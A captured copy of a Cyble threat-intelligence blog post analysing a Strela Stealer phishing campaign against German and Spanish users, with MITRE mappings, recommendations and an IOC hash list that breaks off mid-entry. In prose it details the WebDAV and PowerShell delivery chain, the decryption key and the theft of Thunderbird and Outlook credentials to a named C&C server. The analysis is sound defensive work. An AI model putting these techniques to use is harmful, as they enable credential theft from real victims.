cyble.com
Open in
urlscan Pro
192.0.78.152
Public Scan
URL:
https://cyble.com/blog/strela-stealer-targets-europe-stealthily-via-webdav/
Submission: On November 07 via api from IN — Scanned from US
Submission: On November 07 via api from IN — Scanned from US
Form analysis
4 forms found in the DOMPOST https://wordpress.com/email-subscriptions
<form action="https://wordpress.com/email-subscriptions" method="post" accept-charset="utf-8" data-blog="221651828" data-post_access_level="everybody" data-subscriber_email="" id="subscribe-blog" data-hs-cf-bound="true" data-cb-wrapper="true">
<div class="wp-block-jetpack-subscriptions__form-elements">
<p id="subscribe-email">
<label id="subscribe-field-label" for="subscribe-field" class="screen-reader-text"> Type your email… </label>
<input required="required" type="email" name="email" class="no-border-radius has-ast-global-color-6-border-color" style="font-size: 16px;padding: 10px 15px 10px 15px;border-color: ast-global-color-6;border-radius: 0px;border-width: 1px;"
placeholder="Type your email…" value="" id="subscribe-field" title="Please fill in this field.">
</p>
<p id="subscribe-submit" style="width: ;max-width: 100%;">
<input type="hidden" name="action" value="subscribe">
<input type="hidden" name="blog_id" value="221651828">
<input type="hidden" name="source" value="https://cyble.com/blog/strela-stealer-targets-europe-stealthily-via-webdav/">
<input type="hidden" name="sub-type" value="subscribe-block">
<input type="hidden" name="app_source" value="">
<input type="hidden" name="redirect_fragment" value="subscribe-blog">
<input type="hidden" name="lang" value="en_US">
<input type="hidden" id="_wpnonce" name="_wpnonce" value="5c051a072f"><input type="hidden" name="_wp_http_referer" value="/blog/strela-stealer-targets-europe-stealthily-via-webdav/"><input type="hidden" name="post_id" value="70047"> <button
type="submit" class="wp-block-button__link no-border-radius has-ast-global-color-6-border-color"
style="background: #cc0000;width: 100%;font-size: 16px;padding: 10px 15px 10px 15px;margin: 0; margin-left: 10px;border-color: ast-global-color-6;border-radius: 0px;border-width: 1px;" name="jetpack_subscriptions_widget"> Subscribe Now <span
class="jetpack-memberships-spinner"> <svg width="24" height="24" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
<path d="M12,1A11,11,0,1,0,23,12,11,11,0,0,0,12,1Zm0,19a8,8,0,1,1,8-8A8,8,0,0,1,12,20Z" opacity=".25" fill="currentColor"></path>
<path d="M10.14,1.16a11,11,0,0,0-9,8.92A1.59,1.59,0,0,0,2.46,12,1.52,1.52,0,0,0,4.11,10.7a8,8,0,0,1,6.66-6.61A1.42,1.42,0,0,0,12,2.69h0A1.57,1.57,0,0,0,10.14,1.16Z" class="jetpack-memberships-spinner-rotating" fill="currentColor"></path>
</svg></span></button>
</p>
</div>
</form>
GET https://cyble.com/
<form class="search-form" action="https://cyble.com/" method="get" data-hs-cf-bound="true" data-cb-wrapper="true">
<fieldset>
<span class="text">
<label for="search-field" class="screen-reader-text">Begin Search...</label>
<input id="search-field" name="s" class="search-field" autocomplete="off" type="text" value="" placeholder="Begin Search..." tabindex="1">
</span>
<button aria-label="Search" id="search_submit" class="button search-submit" tabindex="2"><i class="astra-search-icon"> <span class="ast-icon icon-search"></span> </i></button>
</fieldset>
</form>
POST https://wordpress.com/email-subscriptions
<form action="https://wordpress.com/email-subscriptions" method="post" accept-charset="utf-8" data-blog="221651828" data-post_access_level="everybody" data-subscriber_email="" id="subscribe-blog-2" data-hs-cf-bound="true" data-cb-wrapper="true">
<div class="wp-block-jetpack-subscriptions__form-elements">
<p id="subscribe-email">
<label id="subscribe-field-2-label" for="subscribe-field-2" class="screen-reader-text"> Type your email… </label>
<input required="required" type="email" name="email" style="font-size: 16px;padding: 15px 23px 15px 23px;border-radius: 50px;border-width: 1px;" placeholder="Type your email…" value="" id="subscribe-field-2" title="Please fill in this field.">
</p>
<p id="subscribe-submit">
<input type="hidden" name="action" value="subscribe">
<input type="hidden" name="blog_id" value="221651828">
<input type="hidden" name="source" value="https://cyble.com/blog/strela-stealer-targets-europe-stealthily-via-webdav/">
<input type="hidden" name="sub-type" value="subscribe-block">
<input type="hidden" name="app_source" value="atomic-subscription-modal-lo">
<input type="hidden" name="redirect_fragment" value="subscribe-blog-2">
<input type="hidden" name="lang" value="en_US">
<input type="hidden" id="_wpnonce" name="_wpnonce" value="5c051a072f"><input type="hidden" name="_wp_http_referer" value="/blog/strela-stealer-targets-europe-stealthily-via-webdav/"><input type="hidden" name="post_id" value="70047"> <button
type="submit" class="wp-block-button__link" style="font-size: 16px;padding: 15px 23px 15px 23px;margin: 0; margin-left: 10px;border-radius: 50px;border-width: 1px;" name="jetpack_subscriptions_widget"> Subscribe <span
class="jetpack-memberships-spinner"> <svg width="24" height="24" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
<path d="M12,1A11,11,0,1,0,23,12,11,11,0,0,0,12,1Zm0,19a8,8,0,1,1,8-8A8,8,0,0,1,12,20Z" opacity=".25" fill="currentColor"></path>
<path d="M10.14,1.16a11,11,0,0,0-9,8.92A1.59,1.59,0,0,0,2.46,12,1.52,1.52,0,0,0,4.11,10.7a8,8,0,0,1,6.66-6.61A1.42,1.42,0,0,0,12,2.69h0A1.57,1.57,0,0,0,10.14,1.16Z" class="jetpack-memberships-spinner-rotating" fill="currentColor"></path>
</svg></span></button>
</p>
</div>
</form>
<form id="jp-carousel-comment-form" data-hs-cf-bound="true" data-cb-wrapper="true">
<label for="jp-carousel-comment-form-comment-field" class="screen-reader-text">Write a Comment...</label>
<textarea name="comment" class="jp-carousel-comment-form-field jp-carousel-comment-form-textarea" id="jp-carousel-comment-form-comment-field" placeholder="Write a Comment..."></textarea>
<div id="jp-carousel-comment-form-submit-and-info-wrapper">
<div id="jp-carousel-comment-form-commenting-as">
<fieldset>
<label for="jp-carousel-comment-form-email-field">Email</label>
<input type="text" name="email" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-email-field">
</fieldset>
<fieldset>
<label for="jp-carousel-comment-form-author-field">Name</label>
<input type="text" name="author" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-author-field">
</fieldset>
<fieldset>
<label for="jp-carousel-comment-form-url-field">Website</label>
<input type="text" name="url" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-url-field">
</fieldset>
</div>
<input type="submit" name="submit" class="jp-carousel-comment-form-button" id="jp-carousel-comment-form-button-submit" value="Post Comment">
</div>
</form>
Text Content
Check your External Threat Exposure Get Free Threat Assessment Report Try Cyble Vision for 30 days with our Experts Schedule Free Demo × Skip to content * Google Fixes Critical Zero-Day Vulnerabilities in Latest Android Security Update Switch to Cyble Report an Incident Talk to Sales We are Hiring! Login Login * ProductsMenu Toggle * For Enterprises(B2B) and GovernmentsMenu Toggle * AI-Driven Cybersecurity Platforms * Cyble VisionFor Enterprises Award-winning cyber threat intelligence platform, designed to provide enhanced security through real-time intelligence and threat detection. * Cyble HawkFor Federal Bodies Protects sensitive information and assets from cyber threats with its specialized threat detection and intelligence capabilities built for federal bodies. * For Enterprises(B2B) and Individuals(B2C)Menu Toggle * AmIBreached Enables consumers and organizations to Identify, Prioritize and Mitigate darkweb risks. * Odin by CybleNew The most advanced internet-scanning tool in the industry for real-time threat detection and cybersecurity * The Cyber ExpressSubscribe #1 Trending Cyber Security News and Magazine * We’ve just released an update! Cyble has an update that enhances ASM, CTI and more... Menu Toggle * Schedule a Demo * SolutionsMenu Toggle * AI-Driven SolutionsPowered by AIMenu Toggle * Attack Surface Management Ensure digital security by identifying and mitigating threats with Cyble's Attack Surface Management * Brand Intelligence Comprehensive protection against online brand abuse, including brand impersonation, phishing, and fraudulent domains. * Cyber Threat Intelligence Gain insights and enhance your defense with AI-driven analysis and continuous threat monitoring * Dark Web Monitoring Stay vigilant and ahead of cybercriminals with Cyble's comprehensive Dark Web Monitoring. * Vulnerability Management Advanced scanning, risk evaluation, and efficient remediation strategies to protect against cyber threats. * Takedown and Disruption Fight cybercrime with Cyble’s top takedown services—remove fraud sites, content, and disrupt malicious campaigns. * Menu ItemMenu Toggle * Third Party Risk Management Identify and mitigate third-party risks to keep your business secure in external collaborations. * Digital Forensics & Incident Response Cyble offers comprehensive DFIR services to help businesses manage, mitigate, and recover from cyber incidents. * Physical Security Intelligence Monitor multiple locations on one platform with real-time alerts, AI insights, and tailored threat notifications for proactive security. * Executive Monitoring Protect your leadership with proactive threat detection, covering impersonations, PII leaks, and dark web monitoring with prompt alerts. * Cloud Security Posture Management (CSPM) Manage and secure cloud assets with Cyble’s CSPM, ensuring compliance and proactive risk detection across cloud and on-premises environments. * Solutions by Industry Menu Toggle * Healthcare & Pharmaceuticals * Financial Services * Retail and CPG * Technology Industry * Educational Platform * Solutions by Role Menu Toggle * Information Security * Corporate Security * Marketing * Why Cyble?Menu Toggle * Compare CybleMenu Toggle * Industry RecognitionAwards * Customer Stories * ResourcesMenu Toggle * Thought LeadershipMenu Toggle * Blog Discover the latest in cybersecurity with Cyble's blog, featuring a wealth of articles, research findings, and insights. CRIL is an invaluable resource for anyone interested in the evolving world of cyber threats and defenses, offering expert analysis and updates. * Knowledge Hub * Threat Actor Profiles * SAMA Compliance * Events Conferences, Webinars, Training sessions and more… * Data SheetsMenu Toggle * Case Studies Dive into Cyble's case studies to discover real-world applications of their cybersecurity solutions. These studies provide valuable insights into how Cyble addresses various cyber threats and enhances digital security for different organizations. * Research Reports * Country Reports * Industry Reports * Ransomware Reports * WhitepapersDownload * External Threat Assessment ReportDownload Report * Research ReportsLatest Report Menu Toggle * Free Tools * Scan The Dark Web * Scan The Internet * CompanyMenu Toggle * Our Story Learn about Cyble's journey and mission in the cybersecurity landscape. Menu Toggle * Leadership Team Meet our leadership team. * CareersWe are hiring! Explore a career with Cyble and contribute to cutting-edge cybersecurity solutions. Check out Cyble's career opportunities. * Press * PartnersMenu Toggle * Cyble Partner Network (CPN)Join Us Join Cyble's Partner Network to collaborate and innovate in cybersecurity. This platform offers unique opportunities for partnerships, fostering growth and shared success in tackling cyber threats together. Menu Toggle * Partner Login * Become a PartnerRegister Elevate your cybersecurity business with the Cyble Partner Network: Access cutting-edge tools, expert support, and growth opportunities. Ideal for MSSPs, resellers, and alliances. Free Trial Free Trial Main Menu * ProductsMenu Toggle * For Enterprises(B2B) and GovernmentsMenu Toggle * AI-Driven Cybersecurity Platforms * Cyble VisionFor Enterprises Award-winning cyber threat intelligence platform, designed to provide enhanced security through real-time intelligence and threat detection. * Cyble HawkFor Federal Bodies Protects sensitive information and assets from cyber threats with its specialized threat detection and intelligence capabilities built for federal bodies. * For Enterprises(B2B) and Individuals(B2C)Menu Toggle * AmIBreached Enables consumers and organizations to Identify, Prioritize and Mitigate darkweb risks. * Odin by CybleNew The most advanced internet-scanning tool in the industry for real-time threat detection and cybersecurity * The Cyber ExpressSubscribe #1 Trending Cyber Security News and Magazine * We’ve just released an update! Cyble has an update that enhances ASM, CTI and more... Menu Toggle * Schedule a Demo * SolutionsMenu Toggle * AI-Driven SolutionsPowered by AIMenu Toggle * Attack Surface Management Ensure digital security by identifying and mitigating threats with Cyble's Attack Surface Management * Brand Intelligence Comprehensive protection against online brand abuse, including brand impersonation, phishing, and fraudulent domains. * Cyber Threat Intelligence Gain insights and enhance your defense with AI-driven analysis and continuous threat monitoring * Dark Web Monitoring Stay vigilant and ahead of cybercriminals with Cyble's comprehensive Dark Web Monitoring. * Vulnerability Management Advanced scanning, risk evaluation, and efficient remediation strategies to protect against cyber threats. * Takedown and Disruption Fight cybercrime with Cyble’s top takedown services—remove fraud sites, content, and disrupt malicious campaigns. * Menu ItemMenu Toggle * Third Party Risk Management Identify and mitigate third-party risks to keep your business secure in external collaborations. * Digital Forensics & Incident Response Cyble offers comprehensive DFIR services to help businesses manage, mitigate, and recover from cyber incidents. * Physical Security Intelligence Monitor multiple locations on one platform with real-time alerts, AI insights, and tailored threat notifications for proactive security. * Executive Monitoring Protect your leadership with proactive threat detection, covering impersonations, PII leaks, and dark web monitoring with prompt alerts. * Cloud Security Posture Management (CSPM) Manage and secure cloud assets with Cyble’s CSPM, ensuring compliance and proactive risk detection across cloud and on-premises environments. * Solutions by Industry Menu Toggle * Healthcare & Pharmaceuticals * Financial Services * Retail and CPG * Technology Industry * Educational Platform * Solutions by Role Menu Toggle * Information Security * Corporate Security * Marketing * Why Cyble?Menu Toggle * Compare CybleMenu Toggle * Industry RecognitionAwards * Customer Stories * ResourcesMenu Toggle * Thought LeadershipMenu Toggle * Blog Discover the latest in cybersecurity with Cyble's blog, featuring a wealth of articles, research findings, and insights. CRIL is an invaluable resource for anyone interested in the evolving world of cyber threats and defenses, offering expert analysis and updates. * Knowledge Hub * Threat Actor Profiles * SAMA Compliance * Events Conferences, Webinars, Training sessions and more… * Data SheetsMenu Toggle * Case Studies Dive into Cyble's case studies to discover real-world applications of their cybersecurity solutions. These studies provide valuable insights into how Cyble addresses various cyber threats and enhances digital security for different organizations. * Research Reports * Country Reports * Industry Reports * Ransomware Reports * WhitepapersDownload * External Threat Assessment ReportDownload Report * Research ReportsLatest Report Menu Toggle * Free Tools * Scan The Dark Web * Scan The Internet * CompanyMenu Toggle * Our Story Learn about Cyble's journey and mission in the cybersecurity landscape. Menu Toggle * Leadership Team Meet our leadership team. * CareersWe are hiring! Explore a career with Cyble and contribute to cutting-edge cybersecurity solutions. Check out Cyble's career opportunities. * Press * PartnersMenu Toggle * Cyble Partner Network (CPN)Join Us Join Cyble's Partner Network to collaborate and innovate in cybersecurity. This platform offers unique opportunities for partnerships, fostering growth and shared success in tackling cyber threats together. Menu Toggle * Partner Login * Become a PartnerRegister Elevate your cybersecurity business with the Cyble Partner Network: Access cutting-edge tools, expert support, and growth opportunities. Ideal for MSSPs, resellers, and alliances. TRENDING TARGETED INDUSTRIES -> IT & ITES | Government & LEA | Technology | Healthcare | BFSITARGETED COUNTRIES -> United States | Russian Federation | China | United Kingdom | GermanyTARGETED REGIONS -> North America (NA) | Europe & UK | Asia & Pacific (APAC) | Middle East & Africa (MEA) | Australia and New Zealand (ANZ)IOCs -> a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91 | 7bdbd180c081fa63ca94f9c22c457376 | c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0 | 8c69830a50fb85d8a794fa46643493b2 | bbcf7a68f4164a9f5f5cb2d9f30d9790CVEs -> CVE-2024-21887 | CVE-2023-46805 | CVE-2017-11882 | CVE-2024-21893 | CVE-2021-44228TECHNIQUES -> T1082 | T1140 | T1486 | T1083 | T1105TACTICS -> TA505 | TA0011 | TA0001 | TA0002 | TA0005TAGS -> security | the-cyber-express | firewall-daily | the-cyber-express-news | malwareTHREAT ACTORS -> Lockbit | Blackcat | Lazarus | VoltTyphoon | KimsukyMALWARE -> CobaltStrike | Qakbot | Icedid | Trickbot | XmrigSOURCES -> Darkreading | The Cyber Express | Bleepingcomputer | The Hacker News | Infosecurity Magazine Home » Blog » Strela Stealer targets Central and Southwestern Europe through Stealthy Execution via WebDAV * Infostealer, Malware * October 30, 2024 STRELA STEALER TARGETS CENTRAL AND SOUTHWESTERN EUROPE THROUGH STEALTHY EXECUTION VIA WEBDAV Cyble analyzes Strela Stealer’s stealthy phishing campaign targeting Central and Southwestern Europe, using obfuscated JavaScript and WebDAV to deploy its payload and steal sensitive credentials. KEY TAKEAWAYS * The recent Strela Stealer phishing campaign, uncovered by Cyble Research and Intelligence Labs (CRIL), poses as an invoice notification to trick users into engaging with it. * This campaign predominantly targets users in Central and Southwestern European regions, adjusting its focus based on locale settings to maximize its reach within specific demographics. * Phishing emails carry ZIP file attachments containing heavily obfuscated JavaScript (.js) files, which are designed to evade detection by security tools. * The JavaScript file conceals a base64-encoded PowerShell command that, when executed, launches a malicious payload directly from the WebDAV server without saving the file to disk. * The payload, Strela Stealer, is embedded within an obfuscated DLL file, specifically targeting systems in Germany and Spain. * Strela Stealer is programmed to steal sensitive email configuration details, such as server information, usernames, and passwords. * In addition to stealing credentials, Strela Stealer gathers detailed system information, enabling attackers to conduct reconnaissance and potentially launch further targeted actions on compromised systems. EXECUTIVE SUMMARY Strela Stealer, first identified by DCSO in late 2022, is a type of information-stealing malware primarily designed to exfiltrate email account credentials from widely used email clients, including Microsoft Outlook and Mozilla Thunderbird. This malware initially targeted Spanish-speaking users through spam email campaigns containing malicious ISO attachments, which included a .lnk file and a polyglot file. When executed, the .lnk file triggered the polyglot file, executing both the lure html and Strela stealer DLL using “rundll32.exe”. The Threat Actors (TAs) then evolved their tactics by using spear-phishing emails with ZIP file attachments, as identified by Palo Alto. When users downloaded and extracted the archive, a JavaScript file was saved onto their system. Executing the JavaScript file dropped a Base64-encoded file and a batch file. The Base64 file was then decoded using the “certutil -f decode” command, creating a DLL that was executed using “rundll32.exe” with the exported function “hello.“ In their latest campaign, the TAs are using spear-phishing emails with ZIP file attachments containing obfuscated JavaScript code intended to run through WScript. This JavaScript code executes a base64-encoded PowerShell command, which executes the final malicious DLL from a WebDAV server using “rundll32.exe” via the exported function “Entry.” By using this method, the malicious DLL file is not saved on the disk, allowing it to evade detection by security products. TECHNICAL DETAILS: The Strela Stealer campaign begins with a carefully crafted phishing email written in German, with a theme designed to resemble an invoice for a recent product purchase. The email aims to encourage recipients to open the attached ZIP file RG_175_133572_7063403.zip under the pretense of verifying or processing a transaction. The figure below shows one of the phishing emails. Figure 1 – Phishing Email Inside the ZIP file named “RG_175_133572_7063403.zip,” there is a highly obfuscated JavaScript file named “1819737872954318698.js.” This JavaScript file employs advanced obfuscation techniques, using string substitution to generate and execute its hidden code. When triggered, it runs through Windows Script Host (wscript), which then initiates a PowerShell command embedded within the script. Technical Content! Subscribe to Unlock Sign up and get access to Cyble Research and Intelligence Labs' exclusive contents Email Country Phone Unlock this Content The PowerShell command further contains a base64-encoded payload. Once decoded and executed, this encoded command reaches out to a WebDAV server and executes a malicious DLL file named “96492217114973.dll” on the target system, allowing Strela Stealer to embed itself and begin its data-theft operations. The figure below shows the de-obfuscated JavaScript code. Your browser does not support the video tag. Figure 2 – JavaScript File The DLL file acts as a loader for the main payload and includes only a single export function named “Entry”. The DLL includes numerous conditional jump instructions, making analysis more challenging and potentially causing the disassembler to crash. Furthermore, several functionalities may not work properly in the debugger with default settings due to the extensive branching and conditions. The figure below shows the IDA graph view. Figure 3 – IDA graph view Upon execution, the DLL accesses a hardcoded key within its “.data” section, as shown in Figure 5. This key is used to decrypt additional data stored in the same section, ultimately extracting the main executable payload. Figure 4 – Key present in DLL file The code below demonstrates the use of XOR and other arithmetic operations for decryption. Figure 5 – Decrypting the MZ header The image below displays the decrypted MZ content. Figure 6 – MZ Header The resulting MZ file runs directly from the “rundll32.exe” process. For analysis, we extracted this payload and examined it separately, identifying it as Sterla Stealer, a malware active since April 2022. Here we compared the previous version of Sterla Stealer with the new one. Campaign Identified in 2022Campaign Identified in March 2024Latest CampaignNo code obfuscationEmployed control flow obfuscationEmployed control flow obfuscationNo decryption of PE file from DLL fileDecrypts a memory mapped PE fileDecrypts a memory mapped PE filestrela, server.php, key4.db, and login.json strings present in the decrypted PE filestrela, server.php, key4.db, and login.json strings present in the decrypted PE fileStrela string is removedPDB path is presentNo PDB pathNo PDB pathExport function name: StrelaExport function name: helloExport function name: EntryDrops payload from ISODrops payload from ZIPExecutes payload from WebDAV Server While the Strela stealer is running, it hides its window by calling the “ShowWindow” Win32 API with the “SW_HIDE” parameter for the current process. It then creates a thread to display a fake error message, as shown below. Figure 7 – Fake error message Next, the stealer obtains the locale settings from the victim’s machine by utilizing the GetKeyboardLayout API and comparing the results to the specific hardcoded Language identifiers mentioned below. * 0407 – German (Germany) * 0C0A – Spanish (Spain) * 042D – Basque (Spain) If any of these language identifiers match, the stealer continues its execution; if not, it stops. This behavior indicates that the malware specifically targets regions within Germany and Spain. Figure 8 – Locale Check TARGETING THUNDERBIRD The malware scans for Thunderbird profiles and collects “logins.json” and “key4.db” files from all profiles found on the system. These files contain sensitive information, including usernames, passwords, and other email configuration details. Once obtained, the data within these files is encrypted using a custom encryption method with a hardcoded key, “96be98b2-8a00-410d-87da-2482cc8b7793”, and then sent to the TAs command and control (C&C) server at “94.159.113.48” via a POST request. Following the data transmission, the malware expects the response “ANTIROK” from the C&C server and continues to resend the encrypted data using the same encryption method until this response is received. Figure 9 – Targeting Thunderbird profiles TARGETING OUTLOOK To steal Outlook information, the malware examines specific registry keys to retrieve IMAP server details, usernames, and passwords, which are typically stored in encrypted form. It accesses the following registry paths: * Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676 * Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676 * SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\ Using the “CryptUnprotectData” Win32 API, it decrypts these details into plain text. After decryption, the malware applies custom encryption using the same hardcoded key as in the Thunderbird case and an XOR operation before sending the encrypted data to the threat actor’s command-and-control (C&C) server. GATHERING SYSTEM INFORMATION Continuing its data gathering, the malware executes the “systeminfo” command, saving the output as a text file within the Temp directory. This file is then exfiltrated to the TA’s C&C server using the previously mentioned encryption technique. Figure 10 – Gathering systeminfo In some cases, if the response “ANTIROK” is not received from the C&C server, the stealer attempts to re-encrypt the existing encrypted content using the same method. This results in the transmission of the actual data without encryption, as illustrated in the figure below. Figure 11 – Data Exfiltration In its final steps, the malware utilizes a COM object to navigate through the system’s “SpecialFolders” paths, collecting filenames from each directory. This data is compiled into a single output and sent to the attacker’s C2 server. By gathering information on files stored in sensitive locations, the malware enables the TA to perform reconnaissance, potentially planning further data exfiltration or deploying additional malicious activities based on the obtained directory structure. CONCLUSION The recent iterations of the Strela Stealer campaign reveal a notable advancement in malware delivery techniques, highlighting increased sophistication and stealth. By employing spear-phishing emails that contain ZIP file attachments, the malware successfully circumvents conventional security defenses. The use of heavily obfuscated JavaScript, along with base64-encoded PowerShell commands, significantly complicates detection and response efforts. Additionally, executing the DLL file directly from the WebDAV server without saving it to disk effectively bypasses security mechanisms, enabling unauthorized access to sensitive information. This evolution underscores the importance of proactive cybersecurity measures to counter such advanced threats. CYBLE’S THREAT HUNTING PACKAGES At Cyble, we understand the evolving landscape of cyber threats and the need for robust security measures. Our Threat Hunting Packages are specifically designed to detect suspicious remote WebDAV share access and file execution activities, such as those employed by the Strela Stealer malware. In addition to our sophisticated detection capabilities, our Threat Hunting Packages include custom YARA rules tailored to identify signatures associated with Strela Stealer. These rules enhance the Organization’s security posture by enabling quick detection of known threats, ensuring that systems remain protected against sophisticated malware tactics. For further details on this threat and several others being constantly analyzed by Cyble Research and Intelligence Labs, schedule a demo today. RECOMMENDATIONS * Conduct regular training sessions to educate employees about phishing tactics, including recognizing suspicious emails and attachments. * Deploy robust endpoint protection solutions that can detect and respond to malicious activity, including obfuscated scripts and unauthorized file executions. * Implement strict access controls on WebDAV servers, ensuring only authorized users have access. Disable WebDAV if it is not required for business operations to minimize potential attack vectors. * Limit the execution of PowerShell scripts and other scripting languages on endpoints unless necessary for business operations. * Develop and regularly update an incident response plan that includes specific procedures for handling phishing attacks and malware infections. * Implement multi-factor authentication for accessing sensitive systems and accounts, adding an additional layer of security against credential theft. MITRE ATT&CK® TECHNIQUES TacticTechniqueProcedureInitial Access (TA0001)Phishing (T1566)The campaign starts with spear-phishing emails containing ZIP file attachments.Execution (TA0002)User Execution (T1203)The obfuscated JavaScript code executes via WScript, running PowerShell commands.Execution (TA0002)Command and Scripting Interpreter (T1059)PowerShell commands are triggered to execute the final payload.Credential Access (TA0006)Credential Dumping (T1003)The malware retrieves usernames and passwords from Thunderbird and Outlook profiles.Discovery (TA0007)System Information Discovery (T1082)Executes systeminfo to gather system details and save it as a text file.Discovery (TA0007)File and Directory Discovery (T1083)Collects filenames from system directories using COM objects.Command and Control (TA0011)Application Layer Protocol (T1071)The encrypted data is sent to the C&C server via HTTP POST requests.Exfiltration (TA0010)Exfiltration Over Command and Control Channel (T1041)The stolen data, including login credentials, is exfiltrated to the TA’s server. INDICATORS OF COMPROMISE IndicatorsIndicator TypeDescriptiondcd7dd2aaef3e87b467ce4e4682a63d2d01da20e31fada494435ae8a921c09aeSHA256Email75d996a0a5262bff134d7a752efd1fb6325bc2ce347b084967e06725008180f9SHA256Emailc5279ff9c215afbd5c54793c6fc36c80d2cefb0342a1471581b15e43bd4a9b08SHA256Emailbe76ab2054ef174331abfef53825254ac26bfc9657dca9c3767a5e5daf7bec1eSHA256Email4e38abd0fef9a4b3f4cbc674601bc10766d4db588cb83d3e5fb50ec573c372cdSHA256Email08007bc4c3711990eddd7cb342d176f470298027d923589206e4c9212cc95ba3SHA256JavaScript12cd832efcd3e3a6938ca5d445f572731b64866afc0129219d8110030aa22242SHA256JavaScript150f490ae97098342e192a6722872e86d468cbd2fd8b3d6c46f4601acdea85d1SHA256JavaScript154daf225df559d44d066027a5179aa68ebd9ce046787faa84bd3c230ad3fd08SHA256JavaScript16ae254deaa02b0acf5beda73cb178eb5c50e50b8d1752841ae8148b28354585SHA256JavaScript1a60dd873e71c926ede3bc395e45e10062f063a374f05e7ff6721b6e35706ec5SHA256JavaScript1f3b7fb2ec7e3f292a9d5fab2e263c777c4273af872673d324d580387a5f3236SHA256JavaScript22d34569742fc22c109f65a2edc8ef264c44f61e20014ac27160931acfba296cSHA256JavaScript294c66460c3b0da83a3ed894bd1fb8a7fc5fed2b8fb3f6adb555d4b558371f00SHA256JavaScript2c447b38bc71b6b68234e3f7ea389807a9d61597aab5a11cc60133ee01fb7b79SHA256JavaScript3078f89fa189af1fc8d9b76ab03e2ae34de080072057d5630f8d829c18e0b29bSHA256JavaScript32b8f94f5f7f359a3ef758a8de8ed554c7e5dec2b75f9a65461167eaa874cd00SHA256JavaScript34e9df65677f7e89fd3514103d9a75f7fb526485f1c8fa3bf82fe8896991683aSHA256JavaScript34fdf466af7288f0b458daaca9eb76be88e182ae1b2eadb3281371c2d6726bc3SHA256JavaScript36a0751216fc7f90559abb10dcec2c1153e70c9d4da4d06a0a206ec2e726b92fSHA256JavaScript37984a476fdeda094cdb82957a5aa0d2835527c4f403775d5e0182c64cb1a7fbSHA256JavaScript3c09514e197004d822fd26798372cd7dc30ddcc7fe5585a8a13475319f57e7deSHA256JavaScript3fe89e89556c0210bfb5094a524b1f81c87cde6b6bb2320abbe61d68ac6c4a4bSHA256JavaScript404341b290e56b21c74d5768a98580813f5e81a5ef2e97e1af7aec6cb2a719b0SHA256JavaScript4781f4c8a8a43b559d1c1452e0e967cd23f7fd3d41a1065e5a3ec3366e3bf496SHA256JavaScript4a2317a78749539a8bf0d1e134bd68f64a5e956dee9a12157028969949bb29c4SHA256JavaScript4eaf2d0023d9531ee9e0d3958014260d95b817af5e74b9c6819f371a1a5af753SHA256JavaScript50c9bd0f5deca0b2edbc4128aa7895ec0268a246e536110efe81e3a3da696b0cSHA256JavaScript540492ee7e2e3a0036bc34ff47519a17ad6a8300319b1ff9a1d1a210333cb46dSHA256JavaScript58b0ae24a7f325b8c3acd001b4bdff35fc7e440a0bb910750e019a2657de0822SHA256JavaScript59894ed00aaa9f8ab743ea09a1c7add38b7bf378b073aea978fb1703ea9aacddSHA256JavaScript59c8dcd99af398b149bfd80b921e1b06f97e8cc6908d806b174341efb899d647SHA256JavaScript5a3633e0aad62b5ca063e3ffb15a2bbcdf7138f82113299b53f8194525cb32a3SHA256JavaScript5b296616d0cd44147e84e638dffed68d07b305bcee60601147bf41cb01e8c038SHA256JavaScript5c3a86bd9fb12cad7a98041d1ff35ac739b41a9e43abc525c4e96d61be6f9565SHA256JavaScript6044ea92d233b14cc6422e1cea8ee7ea8e241812f3e780f57f096101e5917f8aSHA256JavaScript662a2a870928dc42d9cd04dbbb7a948300c98496bf4f68aa7ce1320d93da3180SHA256JavaScript666060f975e34e610bea2a3e2a6c8bad58506bee6acfbaefd2c02e563736351fSHA256JavaScript67e95381a8d220063ea1a44e75bc9c9c2e0d973fb991c0ce92a798a1bfe23c1dSHA256JavaScript680ea9c726dbfb5b8486ef5b5babb63704f32b4e3e949053b13a344440fe5149SHA256JavaScript68ffebea33905d680c382b4df481c564817044cf41345f41166cfaca106abfeeSHA256JavaScript6cb21cba9555eec2a173719188ffa609f3f99b6f615ada694db3e2de7fa4d9feSHA256JavaScript70f500e1941ce7f0ae0d4c12c44f3e265c701c1169193a55e5f842c093f303ccSHA256JavaScript72c9297608f3ccb059aec33126178e40bd343c3c24b14a8a31a7742757a08a00SHA256JavaScript760c12ae673ae8902dfa096c17bbce7fc3e20eec069b7cc00d6bf1dd4a28757bSHA256JavaScript76972fe36498d115bbcb742d842698fea1ebc062d0f79426dfbcaf4ad8bec0bdSHA256JavaScript78c315657a6dd2d6ca01388aa3575344b689cbd18c172d83fe94399156b8010bSHA256JavaScript7fcf23ad9d241ccd8f46a9a65bdd99741bade2bf323599f5639ebf160d35aa1eSHA256JavaScript8502cf3b180e3ee6e526b5b33e17647d7234773c278d9009a6ae58a01fd96b97SHA256JavaScript8661d72b99ae335b6c0c74e2d2f156f8611666fe7f118ae251e224c8602f72f2SHA256JavaScript8ba18307df322c7c930dc19ff5f3a36b6a9040cc0dd05e65c1a434887a407b70SHA256JavaScript9082620184a4fe05ed92a0e88caea02cfec14d4c6494dc55269d8afade95d352SHA256JavaScript9255e44bcf40afa3c3fbd19f13a1d277c3bd7bd457866e904b220779fadce886SHA256JavaScript93fc8a04b28af9feb86c348c9b3a7d8422729697832e6895f8738b663da32905SHA256JavaScript9a9303997fefb2de0a66db9652d53bce7d17b9a1e8e738ee91801a29f72621d6SHA256JavaScript9aefb3b5e3a0727c6d96b103c432acb57c42294373bbd8d984a8aeb94659cd43SHA256JavaScript9eb4a88bc7ba156af849fcd956744c65677372db5e5cb09115df8e